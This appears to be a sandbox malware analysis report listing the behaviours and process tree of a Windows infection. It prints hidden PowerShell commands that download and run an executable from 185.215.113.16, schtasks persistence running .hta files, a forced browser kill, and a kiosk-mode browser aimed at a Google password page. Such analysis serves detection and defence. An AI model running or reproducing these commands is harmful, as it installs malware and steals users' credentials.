Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850873044091225" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\ProgramData\rsxrj\oqftxb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10036610101\0frhMAb.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3012 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1064 wrote to memory of 3588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1064 wrote to memory of 3536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3536 wrote to memory of 1328 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1064 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2804 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1064 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4012 wrote to memory of 1528 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1064 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1064 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2148 wrote to memory of 4064 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4064 wrote to memory of 1428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 1428 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
PID 2780 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe
PID 2192 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe C:\Windows\SysWOW64\mshta.exe
PID 4628 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1784 wrote to memory of 2424 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1064 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2424 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE
PID 3140 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "vp4tdmap9rK" /tr "mshta \"C:\Temp\yJ5bncm9F.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\mshta.exe

mshta "C:\Temp\yJ5bncm9F.hta"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe

"C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn omjqOma5spW /tr "mshta C:\Users\Admin\AppData\Local\Temp\B9yFyWSkE.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\B9yFyWSkE.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn omjqOma5spW /tr "mshta C:\Users\Admin\AppData\Local\Temp\B9yFyWSkE.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" any_word

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE

"C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "agtOVmaI20Q" /tr "mshta \"C:\Temp\ub5C3wgKQ.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\ub5C3wgKQ.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

"C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe

"C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe"

C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe

"C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe"

C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe

"C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 27194 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee3f8a06-3edb-4beb-9d7e-6ba1df0a2a9a} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2384 -prefsLen 28114 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29fb8f36-6011-47b5-b8e0-6e34d3384cb0} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3000 -childID 1 -isForBrowser -prefsHandle 3064 -prefMapHandle 3092 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {714b3b59-202d-4fed-91a3-0cec2686cfe9} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3964 -childID 2 -isForBrowser -prefsHandle 3956 -prefMapHandle 3948 -prefsLen 32604 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63de17a2-08e4-4b5e-a44f-1922e05f74a0} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4904 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4900 -prefMapHandle 4896 -prefsLen 32604 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86d685ef-179c-4f4e-886f-512dd2a22bca} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" utility

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\ProgramData\rsxrj\oqftxb.exe

C:\ProgramData\rsxrj\oqftxb.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5400 -prefMapHandle 5396 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2837010c-4282-4023-b695-2dabc3d1c234} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 4 -isForBrowser -prefsHandle 5540 -prefMapHandle 5544 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83f6b1c6-6a04-44f0-b6fc-ebc858774fe8} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5728 -childID 5 -isForBrowser -prefsHandle 5836 -prefMapHandle 5832 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ffb078e2-5028-4de4-b43e-01601688392b} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe

"C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe"

C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe

"C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe"

C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe

"C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe

"C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe"

C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6104 -ip 6104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 796

C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1012 -ip 1012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 792

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10036610101\0frhMAb.exe

"C:\Users\Admin\AppData\Local\Temp\10036610101\0frhMAb.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe

"C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe"

C:\Users\Admin\AppData\Local\Temp\10036630101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10036630101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1708 -ip 1708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 800

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffe15acc40,0x7fffe15acc4c,0x7fffe15acc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2072,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1908,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2320 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4476,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4564 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4776 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4740 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4940 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

